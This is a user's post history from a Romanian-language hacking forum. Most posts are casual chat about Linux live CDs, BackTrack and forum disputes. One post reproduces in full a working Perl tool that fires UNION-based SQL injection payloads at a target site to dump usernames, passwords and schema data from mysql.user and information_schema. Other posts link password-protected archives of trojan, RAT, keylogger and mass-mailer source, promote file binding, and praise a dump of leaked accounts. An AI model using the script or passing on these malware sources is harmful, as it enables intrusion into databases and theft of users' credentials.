Jump to content

daatdraqq

Active Members
  • Posts

    4537
  • Joined

  • Last visited

  • Days Won

    32

Everything posted by daatdraqq

  1. 1) Poti sa-l folosesti ca live cd ( il scrii pe cd cu nero -bagi cd-restart-f12-boot from cd/dvd-enter ). sau 2)il instalezi cu ajutorul vmWare .(cauta la tutoriale video ,e facut de neox ) Uite si un tutorial video foarte bine explicat http://freestorage.ro/n99izf0fe0tm
  2. off:Neil Armstrong/21 iulie 1969 "Un pas mic pentru om, un salt urias pentru omenire" on : instaleaza BackTrack ,ai acolo tot ce-ti trebuie ,tutoriale gasesti din belsug ,trebuie doar sa cauti
  3. quick perl script to extract db information via website sql injections #!/usr/bin/perl # sm4x - 2008 # 1nf0rm3r.pl # quick perl script to extract db information via website sql injections # v1.1 - 2008-08-20 # perl informer.pl <from> <to> (for limits) use LWP::UserAgent; use HTTP::Request; #use Crypt::SSLeay; @sqldata = (); @warns = (); @urlhits = (); # account info (must be wrapped in $$<data>:$ or NO DATA IS DISPAYED!!) #@account_vectors = ( #'concat_ws(0x24,0x24,concat_ws(0x3a,user,password,0x24))', #); # add ur own customs for more dumps @account_vectors = ( 'concat_ws(0x24,0x24,concat_ws(0x3a,userid,password,0x24))', 'concat_ws(0x24,0x24,concat_ws(0x3a,user(),version(),user(),0x24))', 'concat_ws(0x24,0x24,concat_ws(0x3a,table_schema,table_name,table_type,0x24))', 'concat_ws(0x24,0x24,concat_ws(0x3a,table_name,column_name,0x24))' ); # account database info - custom #@account_dbnames = ( #'mysql.user' #); @account_dbnames = ( 'mysql.user', 'user', 'information_schema.tables', 'information_schema.columns' ); #comments - custom #@comments = ( #'--' #); @comments = ( '', '--', '/*' ); # perl informer.pl <from> <to> $offset = 0; $sqldata = 0; undef %dups; $from_limit = scalar($ARGV[0]); $to_limit = scalar($ARGV[1]); system("clear"); print q{ [+] --------------------------------------------------------------------- [+] .:: 1nf0rm4nt ::. [+] --------------------------------------------------------------------- }; printf("[+] Usage: perl informer.pl <from limit> <to limit>\n"); printf("[+] Target: http://target.com/index.php?<start link>,<injection_point>,<end link>\n"); if($from_limit > -1 && $to_limit > 0) { printf("[+] Limit $from_limit to $to_limit\n"); } # grab the md5 printf("[+] Site start link: "); chomp($start_link = <STDIN>); #$start_link = 'http://127.0.0.1/index2.php?&id=1+union+select+'; if($start_link !~ /http:\/\//) { $start_link = "http://" . $start_link; } printf("[+] Site ending link: "); chomp($end_link = <STDIN>); #$end_link = ',2'; printf("[+] Targeting: $start_link$end_link\n"); printf("[+]--------------------------------\n"); printf("[+] .:: Scanning ... ::.\n"); foreach $v1(@account_vectors) { $link = $start_link.$v1.$end_link; # attach db with from <DBNAME> foreach $db(@account_dbnames) { if(length($db) > 0) { $link2 = $link.'+from+'.$db; } else { $link2 = $link; } # limits? if($from_limit != $to_limit && $to_limit>0) { for($i = scalar($from_limit); $i < scalar($to_limit); $i++) { $pwnd_link_limit = $link2 ."+limit+".$i.",1"; foreach $comment(@comments) { $pwnd_link_limit_comments = $pwnd_link_limit.$comment; $is_printed = 0; #printf("LINK: $pwnd_link_limit_comments\n"); $request = HTTP::Request->new(GET=>$pwnd_link_limit_comments); $useragent = LWP::UserAgent->new(); # check response $response = $useragent->request($request); if($response->is_success && $response->content =~ /\$\$/) { my @vars = split(/\$\$/, $response->content); foreach $item(@vars) { if($item =~ /:\$/) { #printf("INDEX: $item, $result\n"); #$c = index($item, ':$', 0); $data = substr($item, 0, index($item, ':$', 0)); if(!$dups{$data}) { push(@sqldata, $data); $dups{$data} = 1; if(!$dups{$pwnd_link_limit_comments}) { push(@urlhits, $pwnd_link_limit_comments); $dups{$pwnd_link_limit_comments} = 1; } $sqldata++; } #printf("."); printf("[+] $data\n"); } } } } } } else { # attach comment and try foreach $comment(@comments) { $pwnd_link = $link2.$comment; #printf("[+] Checking: $pwnd_link\n"; $is_printed = 0; $request = HTTP::Request->new(GET=>$pwnd_link); $useragent = LWP::UserAgent->new(); # check response $response = $useragent->request($request); if($response->is_success && $response->content =~ /\$\$/) { my @vars = split(/\$\$/, $response->content); foreach $item(@vars) { if($item =~ /:\$/) { #printf("INDEX: $item, $result\n"); #$c = index($item, ':$', 0); $data = substr($item, 0, index($item, ':$', 0)); if(!$dups{$data}) { push(@sqldata, $data); $dups{$data} = 1; if(!$dups{$pwnd_link_limit_comments}) { push(@urlhits, $pwnd_link_limit_comments); $dups{$pwnd_link_limit_comments} = 1; } $sqldata++; } #printf("."); printf("[+] $data\n"); } } } } # printf(our injection if(!$is_printed) { unshift(@sqlinjections, $pwned_link); #printf("----------------------------------------------------------\n[+] w00t:\n $pwnd_link\n----------------------------------------------------------\n"); $is_printed = 1; } } } } # print found data (no dups) print q{ [+] --------------------------------------------------------------------- [+] .:: r3p0rt ::. [+] --------------------------------------------------------------------- }; #print returned results foreach $item(@sqldata) { printf("[+] $item\n"); } # uncomment for sql query #printf("[+] ---------------------------------------------------------------------\n"); foreach $item(@urlhits) { printf("[+] $item\n"); } printf("[+] ---------------------------------------------------------------------\n"); printf("[+] Total: $sqldata\n"); printf("\n[+] Done\n"); # done
  4. EXCELENT PENTRU INCEPATORI E bazat pe Ubuntu Linux, deci e gratuit, stabil, u?or de instalat ?i folosit, imun la viru?i, spyware ?i malware ?i vine pe un singur CD. O edi?ie nou? apare la fiecare 6 luni sau chiar mai des sincronizat cu lans?rile Ubuntu. Con?ine traduceri ?i corectoare ortografice pentru limbile român? ?i maghiar?, codecuri pentru muzic?, video ?i Flash, suport pentru conectarea la internet prin PPPoE (Romtelecom Clicknet ?i RDS). Poate citi ?i scrie pe parti?iile create de Windows, ?i lucra cu documentele deja existente create cu Microsoft Office. Deoarece Kiwi folose?te depozitele de pachete Ubuntu, actualiz?rile de securitate ?i de corecturi sunt automat disponibile ?i in Kiwi atâta vreme cât sunt ?i pentru versiunea Ubuntu pe care este bazat?, de obicei 18 luni. Pentru a-l încerca, porni?i calculatorul de pe un CD pe care a?i inscrip?ionat imaginea. Ave?i nevoie de 512 Mb de RAM pentru a-l rula in condi?ii bune. Dac? vre?i s?-l instala?i pe disc e nevoie de 4Gb spa?iu liber - fie parti?ie separat?, fie loc liber in parti?ia Windows, în cazul din urm? la instalare se va crea o parti?ie pentru Kiwi. http://depo.osn.ro/content/distributii/linux/romanesti/kiwi-8.12.iso Pagina oficiala : http://www.kiwilinux.org
  5. BioDox v1.0 FULL SOURCE download : http://freestorage.ro/86sa4rljq836 parola :daat ProAgent V1.21 source download : http://freestorage.ro/uqg5wuvgvrwh parola : daat zombiesmailer source download :http://freestorage.ro/0q6v4sgux8q8 parola :daat mixed source codes AcidShiver.zip AIMPasswordRecover.zip Aqua.zip Black Dream.zip Bruteforce.zip BurroFtpServer.zip CommandCenter.zip Controla Machine.zip DerSphear 3.0.zip DeskTopCaptuer.zip DS3.zip Enterprise.zip Evoloution.zip Exemplo Cliente Servidor.zip Explorer.zip Fake MSN by FireWolf.zip FearRAT.zip HelioS Binder 2.0.zip HighStealth.zip HostControl 1.0.zip Http Server.zip HTTP.zip IP-UseName.zip KeyLog98.zip KeyLogger.zip KeyLogger2.zip Lightning.zip Local Port Scanner.zip Mantis 1.0.zip MassIRC.zip Monk 1.0.zip MSN Fake.zip NetTrash 1.01.zip Nirvana.zip 37 K One Of De Last Trojan 1.zip Paltalk Fake.zip Portscanner-2.zip PortSearch.zip PortSniffer.zip Practical KeyLogger.zip RaD.zip Radar Spy 1.0.zip RAT Myst Eclipse.zip Rat Server.zip RATPhillippP.zip Reboot.zip Remote File Browser 1.0.556.zip RemoteKeyLogger.zip RetriveNews.zip Revenger.zip RunProg.zip Rux.zip 19 K Senna Spy Ftp Server 1.0.zip Senna Spy.zip Sequel 0.1F.zip Shell Sample.zip ShowIcon.zip SnackTrojan.zip SniperNet 2.2.zip Stukach.zip System33.zip Trojan Scanner.zip UIN IP.zip Ullysse.zip UltraSpy 1.zip Unexplained 1.0.zip Vampire Worm.zip Virus Connection.zip WebServe CT 1.zip WebServe CT 2.zip Yahoo! Fake.zip http://source.carreblanc.pl/Zrodla/index.php?path=VB/
  6. File binding The concept of binding two or more files of any type together, Resulting in a single installation package this concept has been around for quiet some time now, However there are still alot of people who are confused about how binding works. I will attempt to break the concept of file binding in to small manageable piece so that it will be easier to understand, by the end of this article hopefully you will have a better understand on how binding works....... http://freestorage.ro/41pmrg8kmycq
  7. Crezi ca usor lucru e sa nu ai ce face cu banii? Probabil vor sa-l angajeze ,Bill le are cu astea...
  8. )))))) auuuu
  9. Literele R cu rosu S cu galben T cu albastru (stiu sunt nationalist ) ) ,sau albastru,galben,rosu..
  10. daatdraqq

    Account's

    Bravo ,sunt bune dar ca de obicei vor schimba taranii parolele unde vor putea ..
  11. Enterprise Edition http://freestorage.ro/7w3u8qqolmsv
  12. Last edited by [RO]Mish; Yesterday at 10:32 PM..
  13. Daca e "expirata" de ce mi-ati scos link-ul de download ma ? E o intrebare retorica ) ,stiu de ce l-ati sters .
  14. 80 % din indivizii care lucreaza in politie sunt niste animale ,fac pariu ca nici nu si-au dat seama ce s-a intamplat .Ei sunt experti la batut si inscenari ca sa-si rezolve an-urile . A mai fost acum o luna un atac la o judecatorie si "expertul" lor explica ce s-a intamplat : "este un vierme care odata ce a intrat a inceput sa cauta parole si sa le sparga " ). Am latit de ras ) .Si cand te gandesti ca primesc si bani pentru asta .....
  15. Incearca sa privesti din punctul de vedere al unui simplu utilizator si o sa intelegi de ce am zis "bravo" .Am trecut demult de varsta majoratului si probabil gandesc altfel Edit : RST-ul trece printr-o perioada "grea" ,nu cred ca avem nevoie de asemenea scandaluri .M-am atasat de forumul asta si chiar ma intereseaza ce se intampla sa stii
  16. Asa ceva nu ar trebuii sa se intample .Cand ma inscriu pe un site ,ma gandesc si mi-as dori ca datele mele sa fie in siguranta nu sa circule pe mess ca niste bancuri .Va mai intrebati de ce nu intra oameni de calitate pe site si sunt doar copii care vor CQKILL .Bravo AcidRipp ai procedat corect .Daca nu e seriozitate se duce de rapa tot ...
  17. Esti la off-topic mosule
  18. Nu inteleg de ce ma faci tu pe mine prost si de ce ai tu impresia ca ma cred zeu ....in fine .Probabil iti place sa jignesti gratuit . Bafta in continuare
  19. Am gasit discutia asta pe net despre RST din intamplare ,e de prin 2008 http://www.ultimate.ro/forum/post48303.html
  20. Da ,si bateria era pe clapa si tinea cam 10 ore )))))))
  21. Mie mi-ar place un semnal audio la intrarea pe forum "welcome to romanian security team"
  22. Asa si ...n-am inteles ce vrei sa zici... .. Stii ce e ala "deep freeze" ?
  23. Omu' avea pilot automat ,se facea la misto ca pierde controlul masinii ...pentru spectacol
  24. daatdraqq

    Unu intrebare

    Te mananca-n cur dupa cate vad eu
×
×
  • Create New...